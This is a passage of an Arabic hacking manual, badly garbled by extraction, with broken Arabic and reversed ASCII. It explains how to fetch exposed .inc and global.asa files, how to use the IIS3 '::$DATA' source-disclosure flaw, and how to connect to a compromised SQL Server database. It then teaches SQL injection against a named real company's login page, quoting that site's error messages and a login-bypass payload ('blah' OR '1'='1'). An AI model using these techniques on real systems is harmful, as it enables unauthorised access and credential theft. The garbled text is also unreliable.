‫ﺘﻢﺗﻨﻔﯿﺬﻫﺎ ﻣﻦ ﺟﺎﻧﺐاﻟﻤﻠﻘﻢ وﯾ ﺤ‬
‫ﺘﻮي ﻋﻠﻰاواﻣ ﺮ ﯾ‬
‫ﺘﺪاد *‪inc.‬ﻫﺬا ﻣﻠ ﻒ ﯾ ﺤ‬
‫ﺘﻬﻲﺑﺎﻣ‬ ‫ﻫﻨﺎك ﻣﻠ ﻒ ﯾﻨ‬
‫ﺘﺨﺪم وﻛﻠﻤﺔاﻟﻤ ﺮور‬ ‫اﻟﻤﺴ‬
‫ﻗﻊ ‪.‬‬
‫ﺘﻈ ﺮﻗﻢﺑﺴ ﺤﺐ ﻫﺬااﻟﻤﻠ ﻒ وذﻟﻚﺑﺎ ﺿﺎﻓﺔاﺳﻢاﻟﻤﻠ ﻒﻓﻲ ﻋﻨﻮاناﻟﻤﻮ‬ ‫اذن ﻣﺎذاﺗﻨ‬

‫وﻣﻤﻜﻦانﺗ ﺮى ﻣﺜ ﻞ ﻫﺬااﻻﻣ ﺮﻓﻲ ﺻﻔ ﺤﺔ ‪ASP‬‬


‫ﻋﻨﺪﺗﻄﺒﯿ ﻖاﻟﺜﻐ ﺮة ﻋﻠﯿﻬﺎ ﻫﺬا ﯾﻌﻨﻲاناواﻣ ﺮاﻟﺒ ﺮﻣﺠﺔ دا ﺧ ﻞ ﻣﻠ ﻒ ‪inc.database‬‬

‫>!‪<--"inc.database" = elif edulcni#--‬‬

‫ﺘﻮي ﻋﻠﻰﻛﻠﻤﺔاﻟﻤ ﺮور ﻣﺜ ﻞ ﻣﻠﻔﺎ ت‬


‫وﻫﻨﺎك ﻋﺪة ﻣﻠﻔﺎ تﺗ ﺤ‬

‫‪asa.global‬‬
‫‪asa.global++‬‬
‫‪asa.global-beforemilion‬‬
‫‪asa.global-‬‬
‫‪sql.milion‬‬
‫‪asa.direct-global‬‬

‫‪١ ٦١‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﺎد ﻋﻠﯿﻪ ﻣﻦﻗﺒ ﻞ ﻣﺒ ﺮﻣﺠﯿﻦ ‪SQL‬‬


‫ﻟﯿ ﺲ ﻣﻦاﻟ ﻀ ﺮورةانﺗﻜﻮناﻟﻤﻠﻔﺎ تﺑﻬﺬهاﻻﺳﻤﺎ ءﻟﻜﻦ ﻫﺬا ﻫﻮاﻟﻤﻌ‬

‫ﺘﺐاﺳﻢاﻟﺼﻔ ﺤﺔ ﻣﺜ ﻞاﻻﺗﻲ ‪:‬‬


‫وﻛ ﻞ ﻣﺎﻋﻠﯿﻚﻓﻌﻠﻪانﺗﻜ‬

‫‪htr.+asa.global‬‬

‫ﻫﻨﺎكﺛﻐ ﺮةﻗﺪﯾﻤﺔﻓﻲ ‪ ٣IIS‬وﻫﻲانﺗ ﻀﯿ ﻒﺑﻌﺪ ﺻﻔ ﺤﺔ ‪ ASP‬ﻫﺬااﻟ ﺮﻣﺰ ‪atad$::‬ﻛﻤﺎ ﯾﻠﻲ‬


‫‪atad$::asp.file‬‬
‫ﺘﻄﺒﯿﻘﻬﺎﻓﻘﻂﻟﻠﻌﻠﻢ ﻻاﻛﺜ ﺮ ‪.‬‬
‫ﺘﻌﺐ ﻧﻔﺴﻚﺑ‬‫ﻫﺬهاﻟﺜﻐ ﺮة ﻻﺗﻌﻤ ﻞاﻻ ﻋﻠﻰ ‪٣IIS‬ﻓﻼﺗ‬

‫ﺘﺨﺪم وﻛﻠﻤﺔاﻟﻤ ﺮور ؟؟‬


‫ﺘ ﺮﺑﻨﺎ ﻣﻦاﻟﻨﻬﺎﯾﺔ ‪ ...‬ﻣﺎذاﺑﻌﺪاﻟ ﺤﺼﻮ ل ﻋﻠﻰاﺳﻢاﻟﻤﺴ‬
‫ﻗ‬‫ﻟﻘﺪا‬

‫ﺑﻌﺪﻫﺎاﻟﺪ ﺧﻮ ل ﻋﻠﻰﻗﺎﻋﺪةا ل ‪!! SQL‬‬

‫ﺘﺨﺪم ‪٦٫٠Visual interdev‬ﻟﻜﻨﻲ ﻣﺎزﻟ ﺖاﻓ ﻀ ﻞ‬


‫ﻫﻨﺎك ﻋﺪةﺑ ﺮاﻣ ﺞﺗﺪ ﺧ ﻞ ﻋﻠﻰﻗﺎﻋﺪةاﻟﺒﯿﻨﺎ تاﻧﺎاﺳ‬
‫ﺘﺨﺪاماﻟﺒ ﺮﻧﺎﻣ ﺞاﻟﺴﻬ ﻞ ‪٢٠٠٠ACCESS‬‬ ‫اﺳ‬

‫ﺘﺢاﻟﺒ ﺮﻧﺎﻣﺢاﻟﺬﻫﺎباﻟﻰﻗﺎﺋﻤﺔ‬ ‫ﻛ ﻞ ﻣﺎ ﻋﻠﯿﻚﻓﻌﻠﻪ ﻫﻮﻓ‬


‫‪File‬‬
‫ﺘﺮ‬
‫اﺧ‬
‫‪New‬‬
‫ﺘﺎر‬
‫وﻣﻦﻗﺎﺋﻤﺔاﻟﻤﻠﻔﺎ تاﻟﺠﺪﯾﺪةا ﺧ‬
‫‪(Exiting Data)Project‬‬
‫اي ﻣﺸ ﺮو عﻗﺎﻋﺪةﺑﯿﺎﻧﺎ ت ﻣﻮﺟﻮدة ‪.‬‬
‫ﺘﺮ‬ ‫ﺳﯿﻈﻬ ﺮﻟﻚ ﻣ ﺮﺑﻊ ﻻﻧﺸﺎ ءاﻟﻤﻠ ﻒا ﺧ‬
‫‪Create‬‬
‫اياﻧﺸﺎ ء‬
‫ﺘ ﺮى ﻣ ﺮﺑﻊ‬ ‫اﻻن ﺳ‬
‫‪Data Link Properties‬‬

‫ﺘﺨﺪم ‪-‬ﻛﻠﻤﺔاﻟﻤ ﺮور‬


‫ﻗﻊاواﻻيﺑﻲ ‪-‬اﺳﻢاﻟﻤﺴ‬
‫ﺘﺎجﻓﻘﻂﻟﺜﻼ ث ﻣﻌﻠﻮﻣﺎ تاﺳﻢاﻟﻤﻮ‬
‫ﺗﺤ‬

‫ﻗﻊﻓﻲ ﺻﻨﺪو ق ‪Select or enter server name‬‬


‫‪- ١‬اد ﺧ ﻞاﺳﻢاﻟﻤﻮ‬

‫ﺘﺨﺪمﻓﻲ ‪User Name‬‬


‫‪- ٢‬اﺳﻢاﻟﻤﺴ‬

‫‪- ٣‬ﻛﻠﻤﺔاﻟﺴ ﺮ ‪Password‬‬

‫ﻣﻼ ﺣﻈﺔ )ﻗﻢﺑﺈزاﻟﺔاﻟﺼﺢ ﻣﻦ ﻣ ﺮﺑﻊ ‪(Blank Password‬‬

‫ﺘﺒﺎراﻻﺗﺼﺎ لﺑﻘﺎﻋﺪةاﻟﺒﯿﺎﻧﺎ تاذا رأﯾ ﺖ ﻫﺬه‬


‫ا ﺿﻐﻂﻓﻲاﻟﺒﺪاﯾﺔ ﻋﻠﻰ ‪Test Connection‬ﻓﻲاﻻﺳﻔ ﻞ ﻻ ﺧ‬

‫‪١ ٦٢‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺎﻟﻌﺒﺎرة ‪Test Connection Succeeded‬‬


‫ﻓﻤﻌﻨﺎهاناﻻﺗﺼﺎ لﺑﻘﺎﻋﺪةاﻟﺒﯿﺎﻧﺎ تﺗﻢﺑﻨﺠﺎ ح‪.‬‬
‫ﺘﺎرايﻗﺎﻋﺪةﺑﯿﺎﻧﺎ تﺗ ﺮﯾﺪاﻟﺪ ﺧﻮ لاﻟﯿﻬﺎ ﻣﻦاﻟﻘﺎﺋﻤﺔاﻟﻤﺴﻨﺪﻟﺔ ‪:‬‬ ‫ﯾﻤﻜﻨﻚاﻻنانﺗﺨ‬
‫‪Select the data base on the server‬‬
‫وا ﺿﻐﻂ ﻋﻠﻰ ‪OK‬او ﻣﻮاﻓ ﻖ ‪...‬‬

‫‪١ ٦٣‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" درس ﻣﻔﺼﻞ ﻋﻦ اﻟـ‪" SQL‬‬

‫‪$$$$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪hish_hish :‬‬
‫‪$$$$$$$$$$$$$‬‬

‫ﺘﺨﺪام ﺻﻔ ﺤﺎ ت دﯾﻨﺎﻣﯿﻜﯿﻪ ﻮﻣﻨﻬﺎ ﻣﺎ ﻧ ﺤﻦ ﻣﻮﺟﻮدﯾﻦﻓﯿﻪ ‪(:‬‬ ‫ﻗﻊ ﻹﺳ‬ ‫أﺗﺠﻬ ﺖ ﻏﺎﻟﺒﯿﺔاﻟﻤﻮا‬


‫ﺘﺨﺪمﻗﻮاﻋﺪﺑﯿﺎﻧﺎ تﻓﯿﻬﺎﻛﻢﻛﺒﯿ ﺮ ﻣﻦاﻟﻤﻌﻠﻮﻣﺎ ت‪,‬‬ ‫ﻮﺗﺴ‬
‫ﺘﻲﺗﻌﻤ ﻞ ﺟﻤﺒﺎإﻟﻰ ﺟﻤﺐ ﻣﻊ‬ ‫ﺘﻮبﺑﺈ ﺣﺪىﻟﻐﺎ تاﻟﻮﯾﺐاﻟﺪﯾﻨﺎﻣﯿﻜﯿﻪ ‪PHP‬ﺄو‪ ASP‬ﻮاﻟ‬ ‫ﻮﻋﻦ ﻃ ﺮﯾ ﻖ ﺳﻜ ﺮﺑ ﺖ ﻣﻜ‬
‫ﻣ ﺤ ﺮﻛﺎ تﻗﻮاﻋﺪاﻟﺒﯿﺎﻧﺎ ت ‪.‬‬
‫‪SQL Server , MySQL,Oracle‬‬
‫ﺘﺨﻼ صاﻟﻤﻌﻠﻮﻣﺎ تاﻟﻤﻄﻠﻮﺑﻪ وﺗ ﺮكاﻟﺒﻘﯿﻪ‬ ‫ﺘﻢﺄﺳ‬ ‫ﯾ‬
‫ﺘﺨﻼ ص‬ ‫ﺘﻢأﺳ‬ ‫ـ ‪SQL‬ﻟﯿ‬ ‫ﺘﺨﺪمﺑﻌ ﻀﻬﺎﻓﻲﺗﻜﻮنأواﻣ ﺮاﻟ‬ ‫ﺘﺨﺪم وﻣﻦﺛﻢﺗﻌﺎﻟ ﺞ وﯾﺴ‬ ‫ﺣﯿﺚﺗﺄ ﺧﺬ ﻣﻌﻠﻮﻣﺎ ت ﻣﻦاﻟﻤﺴ‬
‫ﺘﻢ‬
‫ﺘﺨﺪمأو رﻓ ﻀﻪ داﺋﻤﺎ ﯾ‬ ‫ﺘﺄﻛﺪ ﻣﻦ ﺻ ﺤﺔﺑﻌ ﺾاﻟﻤﺪ ﺧﻼ تﻟﺒﻨﺎ ءاﻟﺼﻔ ﺤﺔاﻟﻤﻄﻠﻮﺑﻪأوﻗﺒﻮ لاﻟﻤﺴ‬ ‫اﻟﺒﯿﺎﻧﺎ تأواﻟ‬
‫ﻗﻊ‬‫ﺘﻲﺗﺨﻮﻟﻚﺑﻌﻤ ﻞ ﻋﻤ ﻞ ﻻ ﯾﻘﻮمﺑﻪإﻻ ﻣﻦﻗﺎم ﺻﺎ ﺣﺐاﻟﻤﻮ‬ ‫ﺘﺨﺪم وﻛﻠﻤﺔ ﻣ ﺮورﻓﻲاﻟﺼﻔ ﺤﺎ تاﻟ‬ ‫ﻃﻠﺐأﺳﻢ ﻣﺴ‬
‫ﺘﻪﻓﻲاﻟﻘﺎﺋﻤﻪ ‪((((:‬‬ ‫ﺑﺈﻋﻄﺎﺋﻪاﻟﺼﻼ ﺣﯿﻪﻟﻠﻘﯿﺎمﺑﻬﺎﻛﺄن ﯾﻘﻮمﺑ ﺤﺬ ف ﻣﻮ ﺿﻮﻋﻲ ‪(:‬أوﺗﺜﺒﯿ‬
‫ﺘﻠﻚاﻟﻤﻮﺟﻮده‬ ‫ﺘﺨﺪمﻓﻲﻗﺎﻋﺪةاﻟﺒﯿﺎﻧﺎ ت وأنﻛﻠﻤﺔاﻟﻤ ﺮوراﻟﻤﻌﻄﺎه ﻣﻄﺎﺑﻘﻪﻟ‬ ‫ﺘﺄﻛﺪ ﻣﻦ وﺟﻮدأﺳﻢاﻟﻤﺴ‬ ‫ﺘﻢاﻟ‬‫ﺣﯿﺚ ﯾ‬
‫ﺘﺄﻛﺪ ﻣﻦ وﺟﻮدﻫﺎ‬ ‫ـ ‪ SQL‬ﺎﻟﺬي ﯾﻘﻮمﺑﺎﻟ‬ ‫ﺘﻢأ ﺧﺬ ﻣﻌﻠﻮﻣﻪ وﺗ ﻀﻤﯿﻨﻬﺎﻓﻲأﻣ ﺮاﻟ‬ ‫ﺘﺨﺪم ﺣﯿﺚ ﯾ‬ ‫ﺑﺠﺎﻧﺐأﺳﻢاﻟﻤﺴ‬
‫ﺘﺄﻛﺪ ﻣﻦأﻧﻪ ﻣﺨﻮ لﻟﻪﺑﺎﻟﺪ ﺧﻮ ل‬ ‫ﺘﺨﺪمﻟﻠ‬‫ﺛﯿ ﻖاﻟﻤﺴ‬ ‫ﺘﻮ‬‫ﺘﺎﺑﺔ ﺳﻜ ﺮﺑ ﺖ ﯾﻘﻮمﺑ‬‫ﺘﻬﺎ وﻟﻜﻦ ﯾﺠﺐ ﺎﻟ ﺤﺬر ﻋﻨﺪﻛ‬ ‫و ﺻﻼ ﺣﯿ‬
‫ﺘﺨﺪم و ﺧﻠﻮﻫﺎ ﻣﻦأي ﺮﻣﻮز ﻣﻦ ﺷﺄﻧﻬﺎ‬ ‫ﺘﻘﺒﻠﻪ ﻣﻦاﻟﻤﺴ‬ ‫ﺘﺄﻛﺪ ﻣﻦ ﻧﻈﺎﻓﺔاﻟﻘﯿﻢاﻟﻤﺴ‬ ‫ﻟﻠﺼﻔ ﺤﻪ ﺎﻟﻤ ﺤﻤﯿﻪأمﻻ وذﻟﻚﺑﺎﻟ‬
‫ـ ‪ SQL‬ﺧﺎ ﻃﺊﻓﻲﺑﻨﺎﺋﻪأواﻟﻘﯿﺎمﺑﺄيأﻣ ﺮ ﻏﯿ ﺮ ﻣﺴﻤﻮ حﺑﻪ‬ ‫أنﺗﺠﻌ ﻞأﻣ ﺮاﻟ‬

‫ﺘﻜﻠﻢاﻵن ﻋﻦ ﻣﺎ ﯾﺴﻤﻰ ‪SQL injection‬‬ ‫ﺳﻨ‬


‫ﺘﺠ ﺮﺑﻪ‬‫ﻗﻊﻟﻠ‬
‫ﺛﯿ ﻖ وأﯾ ﻀﺎﺑﻮﺟﻮد ﻣﻮ‬ ‫ﺘﻮ‬‫ﺘﺎﺑﺔ ﺳﻜ ﺮﺑ ﺖ ﺎﻟ‬ ‫ﺣﯿﺚأﻧﻪ ﺿﻌ ﻒﻓﻲﻛ‬
‫ﻗﻊ ﺷ ﺮﻛﺔاﻹﺗﺼﺎﻻ تاﻟﺴﻌﻮدﯾﻪ‬ ‫ﻮﻫﻮ ﻣﻮ‬
‫ﻗﻊ ‪http://www.stc.com.sa/‬‬ ‫ﻋﻨﻮان ﺎﻟﻤﻮ‬
‫ﺘ ﺮﻧ ﺖﻓﻲاﻟﺴﻌﻮدﯾﻪ‬
‫ﺘ ﺺﺑﻤﻘﺪﻣﻲ ﺧﺪﻣﺔأﻧ‬ ‫ﻋﻨﺪاﻟﺪ ﺧﻮ لﻟﻠﺼﻔ ﺤﺔاﻟ ﺮﺋﯿﺴﯿﻪ ﻧﺠﺪ راﺑﻂ ﯾﺨ‬
‫ﻮﻫﻮ ‪http://www.stc.com.sa/arabic/scripts/ar_frame.asp?pagenum=25‬‬
‫ﺘﺨﺪم وﻛﻠﻤﺔ ﻣ ﺮور !!!!‬‫ﻋﻨﺪ ﺪ ﺧﻮﻟﻪﻓﺄﻧﻪ ﯾﻄﻠﺐ ﻣﻨﻚأﺳﻢ ﻣﺴ‬
‫ـ‪SQL injection‬‬ ‫ﺘﺒﺎدرﻟﻨﺎ ﻫﻮاﻟ‬ ‫ﺪاﺋﻤﺎﻓﻲاﻟ ﺤﺎﻟﻪﻫﺬهأو ل ﻣﺎ ﯾ‬
‫ﺘﺠ ﺮﺑﺔ‬‫ﻧﻘﻮمﺑ‬
‫ﺘﺨﺪم ‪' :‬‬ ‫ﺄﺳﻢ ﻣﺴ‬
‫ﻮﻛﻠﻤﺔ ﻣ ﺮور' ‪:‬‬
‫ﺘﺎﻟﻲ‬‫ﻓﻨ ﺤﺼ ﻞ ﻋﻠﻰاﻟﺨﻄﺄاﻟ‬

‫ﺘﺒﺎس ‪:‬‬
‫ﻗ‬‫ﺎ‬

‫‪Microsoft OLE DB Provider for ODBC Drivers error‬‬


‫'‪'80040e14‬‬

‫‪١ ٦٤‬‬
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed


quotation mark before the character string '' '.
/arabic/Scripts/ar_csd_reply.asp, line 33

‫ﺘﺎﻟﻲ‬
‫ﻮﻓﻲﺑﻌ ﺾاﻟ ﺤﺎﻻ ت ﯾﻈﻬ ﺮاﻟﺨﻄﺎاﻟ‬

: ‫ﺘﺒﺎس‬
‫ﻗ‬‫ا‬

Microsoft OLE DB Provider for ODBC Drivers error


'80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed
quotation mark
before the character string ''' AND Password=''.
/admin/admin.asp, line 13

‫ ﻮأﯾ ﻀﺎأﺳﻢأ ﺣﺪ ﺎﻷﻋﻤﺪهﻓﻲاﻟﺠﺪو ل‬SQL ‫ـ‬


‫ﻮﻓﻲاﻟﺨﻄﺄﻫﺬا ﺣﺼﻠﻨﺎ ﻋﻠﻰ ﺟﺰ ء ﻣﻦأﻣ ﺮاﻟ‬

‫ﺘﺨﺪم وﻛﻠﻤﺔ‬‫ﺘ ﺤﻘ ﻖ ﺻﻼ ﺣﯿﺔأﺳﻢاﻟﻤﺴ‬ ‫ﺘﺨﺪﻣﻪﻟﻠ‬‫ ﺎﻟﻤﺴ‬SQL Query ‫ـ‬ ‫ﻟﻠ‬inject ‫ﻮﻫﻮ ﻣﺎ ﯾﺆﻛﺪأﻣﻜﺎﻧﯿﺔ ﻋﻤ ﻞ‬
. ‫اﻟﻤ ﺮوراﻟﻤﺪ ﺧﻠﻪ‬
‫ﺘﻔﺼﯿ ﻞ‬‫ﺑﺸﻲ ء ﻣﻦاﻟ‬SQL injection ‫ـ‬ ‫ﺘﻜﻠﻢ ﻋﻦاﻟ‬ ‫ﺈذنﻟﻨ‬
‫ﺘﺨﺪمﻗﺄﻧﻨﺎ‬‫ﺘﺨﺪم وﻛﻠﻤﺔاﻟﻤ ﺮوراﻟﻤﺪ ﺧﻠﻪ ﻣﻦاﻟﻤﺴ‬ ‫ﺘﺄﻛﺪ ﻣﻦ ﺻﻼ ﺣﯿﺔاﺳﻢ ﺎﻟﻤﺴ‬‫ﻟﻮﻛﺎنﻟﺪﯾﻨﺎ ﺳﻜ ﺮﺑ ﺖ ﯾﻘﻮمﺑﺎﻟ‬
‫ﺘﺎﻟﯿﻪ‬
‫ﺘ ﺤﻘ ﻖ ﻣﻨﻬﺎﺑﺎﻟﻄ ﺮﯾﻘﺔ ﺎﻟ‬‫ﺳﻨ‬
code:

SELECT * from Users WHERE User_Name='<field from web


form>' AND Password='<field from web form>'
if( TRUE ){
Login OK
}
else {
Login FAILD
}

١ ٦٥
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﻮﺛﯿ ﻖ ﻧﻔﺴﻪﻗﺒ ﻞأن ﯾﺴﻤﺢﻟﻪ‬


‫ﻋﻨﺪﻗﯿﺎمأ ﺣﺪاﻟﻤﺴﻤﻮ حﻟﻬﻢﺑﺎﻟﺪ ﺧﻮ لﻟﻠﺼﻔ ﺤﺔاﻟﻤ ﺤﻤﯿﻪﻓﺄﻧﻪ ﯾﻘﻮمﺑﻜ ﻞﺗﺄﻛﯿﺪﺑ‬
‫ﺑﺎﻟﺪ ﺧﻮ ل‬
‫ﺘﺨﺪم وﻛﻠﻤﺔاﻟﻤ ﺮوراﻟﺨﺎ ﺻﻪﺑﻪ‬ ‫ﻓﻌﻨﺪﻗﯿﺎﻣﻪﺑﺄد ﺧﺎ لأﺳﻢاﻟﻤﺴ‬
‫ﺘﺨﺪم‪: admin‬‬ ‫ﺄﺳﻢ ﺎﻟﻤﺴ‬
‫ﻛﻠﻤﺔاﻟﻤ ﺮور‪: t0ps3cr3t‬‬
‫ﺘﺎﻟﻲ ‪:‬‬
‫ـ ‪ SQL‬ﺳﯿﺼﺒﺢﺑﺎﻟﺸﻜ ﻞ ﺎﻟ‬ ‫ﻓﺈن ﺷﻜ ﻞاﻣ ﺮاﻟ‬
‫‪code:‬‬

‫‪SELECT * from Users WHERE Users_Name='admin' AND‬‬


‫'‪Password='t0ps3cr3t‬‬

‫ﺘﺨﺪم ‪ admin‬ﻮﻛﻠﻤﺔاﻟﻤ ﺮور‬


‫ﻮﻋﻨﺪ وﺟﻮد ﺳﻄ ﺮﻓﻲ ﺟﺪو ل ‪User‬ﺗ ﺤﻘ ﻖﻓﯿﻪاﻟﺸ ﺮط وﻫﻮأن ﯾﻜﻮناﺳﻢاﻟﻤﺴ‬
‫‪t0ps3cr3t‬‬
‫ﺘﺨﺪم ﻣﺨﻮ لﺑﺎﻟﺪ ﺧﻮ ل ‪.‬‬‫ﻓﺄن ﺎﻷﻣ ﺮ ﺳﯿﻘﻮمﺑﺈرﺟﺎ عﻗﯿﻤﺔ ‪TRUE‬ﺄيأناﻟﻤﺴ‬
‫ﺘﻢ رﻓ ﺾاﻟﺪ ﺧﻮ ل‬
‫ﺘﻢإرﺟﺎ ع ‪ FALSE‬ﻮﺳﯿ‬
‫ﻏﯿ ﺮ ذﻟﻚ ﺳﯿ‬

‫ـ‪SQL .‬‬ ‫ﻣﻼ ﺣﻈﻪ ‪ :‬ﯾﺠﺐأن ﯾﻜﻮنﻟﺪﯾﻚ وﻟﻮاﻟﻘﻠﯿ ﻞ ﻣﻦاﻟﻤﻌ ﺮﻓﻪﺑﺄواﻣ ﺮاﻟ‬
‫ﺘﻪ‬‫ﺘ ﺤﻘ ﻖ ﻣﻦ ﺻﻼ ﺣﯿ‬‫ﺘﺨﺪمﻓﻲ ﺻﻔ ﺤﺔاﻟ‬ ‫>‪<field from web form‬ﯾ ﺤ ﻞ ﻣ ﺤﻠﻬﺎ ﻣﺎأد ﺧﻠﻪاﻟﻤﺴ‬
‫ﺘﺎﻟﻲ‬
‫ـ ‪SQL‬ﺄﺻﺒﺢﺑﺎﻟﺸﻜ ﻞاﻟ‬ ‫ﺘﺨﺪم وﺑﺎﻟﻤﺜ ﻞﻟﻜﻠﻤﺔاﻟﻤ ﺮورﻓﺄنأﻣ ﺮاﻟ‬‫ﺘﻨﺎ ﻋﻨﺪﻣﺎﻗﻤﻨﺎﺑﺈد ﺧﺎ ل 'ﻛﺈﺳﻢ ﻣﺴ‬
‫ﻓﻲﺗﺠ ﺮﺑ‬
‫‪:‬‬
‫‪code:‬‬

‫‪SELECT * from Users WHERE User_Name=' ' ' AND‬‬


‫' ' '=‪Password‬‬

‫ﺘﻨﺼﯿ ﺺاﻷوﻟﻰ وﺑﻘﻲ ﻋﻼﻣﺔﺗﻨﺼﯿ ﺺﻟﻢﺗﻐﻠ ﻖﺑﻌﺪ‬‫ﻮﻧﻼ ﺣﻆأﻧﻨﺎﻗﻤﻨﺎﺑﺈﻏﻼ ق ﻋﻼﻣﺔ ﺎﻟ‬


‫ﻮﻫﻮ ﻣﺎأدىﻟﻈﻬﻮر رﺳﺎﻟﺔاﻟﺨﻄﺄ!!‬

‫ﺘﺨﺪم‪: blah' OR '1'='1‬‬


‫ٍم ﻣﺴ‬
‫ﺘﺠ ﺮﺑﺔا‬ ‫ﺎﻷن ﻧﻘﻮمﺑ‬
‫ﻮﻣﺜﻠﻬﺎﻟﻜﻠﻤﺔ ﺎﻟﻤ ﺮور‪.‬‬
‫ـ‪SQL‬‬ ‫ﻓﯿﺼﺒﺢ ﺷﻜ ﻞأﻣ ﺮاﻟ‬
‫‪code:‬‬

‫'‪SELECT * from Users WHERE User_Name='blah' OR '1'='1‬‬


‫'‪AND Password='blah' OR '1'='1‬‬

‫‪١ ٦٦‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﻟﻨ ﺤﻠ ﻞاﻷﻣ ﺮﻛ ﻞ ﺟﺰ ء ﻋﻠﻰ ﺣﺪا‬


‫‪SELECT * from Users‬‬
‫ﺘ ﺮ ﺟﻤﯿﻊاﻟﺴﻄﻮر ﻣﻦاﻟﺠﺪو ل‪Users‬‬ ‫ﺗﻌﻨﻲأ ﺧ‬
‫'‪WHERE User_Name='blah' OR '1'='1' AND Password='blah' OR '1'='1‬‬
‫ﺘ ﺤﻘ ﻖﻓﯿﻪاﻟﺸ ﺮوط‬
‫ﺘﯿﺎره وﻫﻮاﻟﺬيﺗ‬ ‫ﺘ ﺤﺪﯾﺪاﻟﺴﻄ ﺮاﻟﺬي ﺳﻨﻘﻮمﺑﺈ ﺧ‬ ‫ﻓﻲ ﻫﺬااﻟﺠﺰ ء ﻧﻘﻮمﺑ‬
‫'‪'blah' OR '1'='1‬‬
‫ﻫﻨﺎﺑﻮﺟﻮد ‪OR‬ﻟﻢﺗﺼﺒﺢﻗﯿﻤﺔ ﻧﺼﯿﻪ وﻟﻜﻦأ ﺻﺒ ﺤ ﺖ ﺷ ﺮط‬
‫ﺘ ﺮﻛﻪﻓﻲاﻟﺸ ﺮط ﺻ ﺤﯿﺢ‬ ‫ﻗ ﻞ ﻣﻦاﻷ ﻃ ﺮا فاﻟﻤﺸ‬ ‫ﯾﺼﺒﺢاﻟﺸ ﺮط ﺻ ﺤﯿﺢإذاﻛﺎن ﻃ ﺮ ف وا ﺣﺪ ﻋﻠﻰاﻷ‬
‫ﺘﻨﺎﻓﺈناﻟﻄ ﺮ ف ﺎﻷو ل ﻫﻮ'‪'blah‬‬ ‫ﻮﻓﻲ ﺣﺎﻟ‬
‫ﻮﻫﻮﺑﺪوناﻟﺨﻮ ضﻓﻲﺗﻔﺎ ﺻﯿ ﻞﻟﺴﻨﺎﻓﻲ ﺻﺪدﻫﺎاﻻن ﯾﻌﺒ ﺮ ﻋﻦﻗﯿﻤﺔ ﺻ ﺤﯿ ﺤﻪ‪TRUE‬‬
‫ﻮاﻟﻄ ﺮ فاﻷ ﺧ ﺮ ﻫﻮ '‪'١'='١‬‬
‫ـ ‪١‬ﺄم ﻻ !!!!‬ ‫ﯾﻤﻜﻨﻚاﻹﺟﺎﺑﺔ ﻋﻦإذاﻛﺎﻧ ﺖ ‪ ١‬ﻣﺴﺎوﯾﻪﻟ‬
‫ﺈذا ﺳﯿﻜﻮن ﺷﻜ ﻞاﻟﺸ ﺮطﺑﻌﺪﺗ ﺤﻠﯿﻠﻪ ﻫﻮ‪TRUE OR TRUE‬‬
‫ﺘﯿﺠﻪاﻟﻨﻬﺎﺋﯿﻪﻟﻠﺸ ﺮط ﻫﻲ‪TRUE‬‬ ‫ﺘﺎﻟﻲﻓﺈن ﺎﻟﻨ‬‫ﻮﺑﺎﻟ‬
‫ﺘﻔﺎﺻﯿ ﻞﺗ ﺤﺪ ثﻟﻜﻠﻤﺔاﻟﻤ ﺮور‬ ‫ﻮﻧﻔ ﺲاﻟ‬
‫ﺘﺒﻬﺎ‬
‫ﺘﻲ ﻧﻜ‬
‫ﺘﻲ ﻧ ﺤﺼﻠﻬﺎ ﻣﻦاﻟﺸ ﺮطﻟﯿﺴ ﺖ ﻣﺴﺎوﯾﻪﻟﻠﻜﻠﻤﻪ ‪ TRUE‬ﺎﻟ‬ ‫ُ‪:‬اﻟﻘﯿﻤﻪ ‪ TRUE‬ﺎﻟ‬ ‫ﻣﻼ ﺣﻈﻪ ﻣﻬﻤﻪ ﺟﺪا‬
‫ﻋﻠﻰﻟﻮ ﺣﺔاﻟﻤﻔﺎﺗﯿﺢاﻟﺨﺎ ﺻﻪﺑﻨﺎ‬
‫ـ‪SQL injection‬‬ ‫ﺘﺨﺪم ‪ TRUE‬ﻮﻛﻠﻤﺔ ﻣ ﺮور ‪ TRUE‬ﻹﺗﻤﺎماﻟ‬ ‫ﺘﺨﺪامأﺳﻢ ﻣﺴ‬ ‫ﻟﺬﻟﻚ ﻻﺗ ﺤﺎو لإﺳ‬

‫ﺘﻮﯾﺎﺗﻪﻓﻲ ﻣﺼﻔﻮﻓﻪ‬ ‫ﺘﯿﺎرأو ل ﺳﻄ ﺮ ﻣﻦ ﺎﻟﺠﺪو ل ‪ Users‬ﻮﯾ ﺮﺟﻊ ﻣ ﺤ‬ ‫ﺎﻟﺸ ﺮطاﻟﺴﺎﺑ ﻖ ﺳﯿﻘﻮمﺑﺄ ﺧ‬


‫ﺘﻄﻌ ﺖاﻟﺪ ﺧﻮ لﻟﻠﺼﻔ ﺤﺔاﻟﻤ ﺤﻤﯿﻪ‬‫ﺘﺠﺪأﻧﻚﻗﺪﺄﺳ‬ ‫ﺘﺎﻟﻲﻓﻲﺑﻌ ﺾاﻟ ﺤﺎﻻ ت ﺳ‬ ‫ﻮﺑﺎﻟ‬
‫ﻮﻟﻜﻦﻓﻲ ﺣﺎﻻ تأ ﺧ ﺮى ﻻ‬
‫ﺘﻔﺎ ﺻﯿ ﻞ‪.....‬‬
‫ﻟﻨﻜﻤ ﻞاﻟ‬
